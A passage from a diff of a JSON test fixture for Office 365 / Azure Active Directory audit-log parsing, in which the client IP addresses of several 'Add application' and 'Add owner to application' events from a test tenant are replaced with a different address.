"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16678,9 +16678,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { @@ -16898,7 +16898,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16928,9 +16928,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { @@ -17148,7 +17148,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"